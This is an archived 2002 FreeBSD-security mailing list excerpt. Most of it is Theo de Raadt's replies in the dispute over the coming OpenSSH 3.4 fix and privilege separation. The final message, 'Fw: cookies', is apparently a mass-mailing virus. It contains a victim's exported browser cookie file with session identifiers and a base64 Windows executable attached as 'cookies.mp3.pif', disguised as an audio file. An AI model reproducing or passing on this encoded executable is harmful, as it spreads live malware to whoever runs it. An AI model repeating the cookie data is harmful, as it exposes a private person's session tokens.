message From owner-freebsd-security Tue Jun 25 1:54:35 2002 Delivered-To: freebsd-security@freebsd.org Received: from cvs.openbsd.org (cvs.openbsd.org [199.185.137.3]) by hub.freebsd.org (Postfix) with ESMTP id 0711037B404 for ; Tue, 25 Jun 2002 01:54:27 -0700 (PDT) Received: from cvs.openbsd.org (deraadt@localhost [127.0.0.1]) by cvs.openbsd.org (8.12.4/8.12.1) with ESMTP id g5P8tALJ009445; Tue, 25 Jun 2002 02:55:11 -0600 (MDT) Message-Id: <200206250855.g5P8tALJ009445@cvs.openbsd.org> To: Joshua Goodall Cc: Theo de Raadt , freebsd-security@FreeBSD.ORG Subject: Re: Hogwash In-reply-to: Your message of "Tue, 25 Jun 2002 15:10:51 +1000." <20020625051051.GA4009@roughtrade.net> Date: Tue, 25 Jun 2002 02:55:10 -0600 From: Theo de Raadt Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I think our intent is to make 3.4 be 3.3.1 + the fix. If it isn't, we are going to try to make it easy in some other way. Be ready on Monday morning for a small patch, and simple roll-out. > Something I would like to know - and I think you can tell us without > compromising much - is whether 3.4 will be more than 3.3 + fix for > this exploit. This will help those who roll our own packages/maintain > large deployments to plan in advance. (i.e. will we need an hour > or a day to merge changes?) > > Joshua > > On Mon, Jun 24, 2002 at 05:27:11PM -0600, Theo de Raadt wrote: > > > Nobody is `in' on the bug. The OpenSSH team has given details to no > > > one so far, so we are assured to be blindsided. I'm afraid security > > > contacts with various projects and vendors know no more than what was > > > said in the bugtraq posting. > > > > Bullshit. > > > > You have been told to move up to privsep so that you are immunized by > > the time the bug is released. > > > > If you fail to immunize your users, then the best you can do is tell > > them to disable OpenSSH until 3.4 is out early next week with the > > bugfix in it. Of course, then the bug will be public. > > > > I am not nearly naive enough to believe that we can release a patch > > for this issue to any vendor, and have it not leak immediately. > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message x1 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 1:57:39 2002 Delivered-To: freebsd-security@freebsd.org Received: from cvs.openbsd.org (cvs.openbsd.org [199.185.137.3]) by hub.freebsd.org (Postfix) with ESMTP id 7E0EA37B40C; Tue, 25 Jun 2002 01:57:20 -0700 (PDT) Received: from cvs.openbsd.org (deraadt@localhost [127.0.0.1]) by cvs.openbsd.org (8.12.4/8.12.1) with ESMTP id g5P8w4LJ012623; Tue, 25 Jun 2002 02:58:04 -0600 (MDT) Message-Id: <200206250858.g5P8w4LJ012623@cvs.openbsd.org> To: Jarkko Santala Cc: Sean Kelly , Ted Cabeen , "Jacques A. Vidrine" , freebsd-security@FreeBSD.ORG Subject: Re: Hogwash In-reply-to: Your message of "Tue, 25 Jun 2002 08:48:53 +0300." <20020625084249.M12462-100000@trillian.santala.org> Date: Tue, 25 Jun 2002 02:58:04 -0600 From: Theo de Raadt Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org * THIS SOFTWARE IS PROVIDED BY THE AUTHORS ''AS IS'' AND ANY EXPRESS * OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR CONTRIBUTORS BE * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR * BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE * OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, * EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. > On Mon, 24 Jun 2002, Theo de Raadt wrote: > > > By holding this information back for a few more days, we are > > permitting a very important protocol to be upgraded in an immune way, > > OR YOU CAN TURN IT OFF NOW. > > You have mentioned this "turn it off" solution more than twice. Is this > your official answer to any exploits in OpenSSH? Can I quote you on this? > > How do you figure this works for commercial companies that need secsh > connections for business critical needs up and running 24x7? > > -jake > > -- > Jarkko Santala http://www.iki.fi/~jake/ > System Administrator 2001:670:83:f08::/64 > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 2:10:33 2002 Delivered-To: freebsd-security@freebsd.org Received: from cvs.openbsd.org (cvs.openbsd.org [199.185.137.3]) by hub.freebsd.org (Postfix) with ESMTP id EE09737B400 for ; Tue, 25 Jun 2002 02:10:22 -0700 (PDT) Received: from cvs.openbsd.org (deraadt@localhost [127.0.0.1]) by cvs.openbsd.org (8.12.4/8.12.1) with ESMTP id g5P9B6LI025819; Tue, 25 Jun 2002 03:11:06 -0600 (MDT) Message-Id: <200206250911.g5P9B6LI025819@cvs.openbsd.org> To: Brian Nelson Cc: Alfred Perlstein , FreeBSD Security Subject: Re: ENOUGH!!! Re: [openssh-unix-announce] Re: Upcoming OpenSSH vulner ability (fwd) In-reply-to: Your message of "Tue, 25 Jun 2002 01:12:23 PDT." <3D1825E7.4030201@notgod.com> Date: Tue, 25 Jun 2002 03:11:06 -0600 From: Theo de Raadt Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > Alfred Perlstein wrote: > > *sigh* > > > > People don't get that what Theo is doing is very fair. > > > > He's giving everyone a chance to protect themselves, the only people > > that are getting screwed are those that are too damn lazy to adapt > > the 'priv' stuff to their OS. > > > > Quit your whining and submit patches to update your favorite version > > of FreeBSD already! > > > > thanks, > > -Alfred > > I think I personally don't disagree with Theo, but I am confused about > the state of Privelage Seperation for people not running > (Open|NET)BSD... So it's a hard pill to swallow when the software is "a > few days old". I am much more comfortable with a patched version coming > from my vendor (in this case the FreeBSD core team) and firewalling my > box until that is available.... The thing is not public yet. Then what is your worry? You have three choices: 1) Accept that it is not public 2) Disable it. 3) Install a current freebsd patch of some sort, which has some privesep in it. And further more you can 4) Track improvements to freebsd privsep support. Piece of cake. No brainer. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 2:30:54 2002 Delivered-To: freebsd-security@freebsd.org Received: from mxout2.netvision.net.il (mxout2.netvision.net.il [194.90.9.21]) by hub.freebsd.org (Postfix) with ESMTP id 5E98B37B404 for ; Tue, 25 Jun 2002 02:30:02 -0700 (PDT) Received: from mailgw.netvision.net.il ([62.0.163.225]) by mxout2.netvision.net.il (iPlanet Messaging Server 5.2 HotFix 0.6 (built Jun 11 2002)) with SMTP id <0GY900L4C8NLXI@mxout2.netvision.net.il> for freebsd-security@freebsd.org; Tue, 25 Jun 2002 12:21:26 +0300 (IDT) Date: Tue, 25 Jun 2002 12:20:21 +0000 (PM) From: Hotel Shefayim Subject: Fw: cookies To: freebsd-security@freebsd.org Message-id: <0GY900L4D8NLXI@mxout2.netvision.net.il> MIME-version: 1.0 X-Mailer: Microsoft Outlook Express 5.50.4133.2400 Content-type: multipart/mixed; boundary="Boundary_(ID_7+HkFfWUYiV9wZBgnwVAxQ)" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --Boundary_(ID_7+HkFfWUYiV9wZBgnwVAxQ) Content-type: text/html Content-transfer-encoding: 7BIT charset="iso-8859-1" # Internet Explorer cookie file, exported for Netscape browsers. doubleclick.net TRUE / FALSE 1920862683 id 800000014a92169 cgi.sexswap.com TRUE / FALSE 966509358 gotoadlocation00 136 hadashot.com TRUE / FALSE 2051585943 SITESERVER IDJ749738dddfe37cfe03e55bdbc0cbba forums.ort.org.i
.
.
See the attachement
--Boundary_(ID_7+HkFfWUYiV9wZBgnwVAxQ) Content-type: application/octet-stream; name=cookies.mp3.pif Content-transfer-encoding: base64 Content-disposition: attachment; filename=" .pif" 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 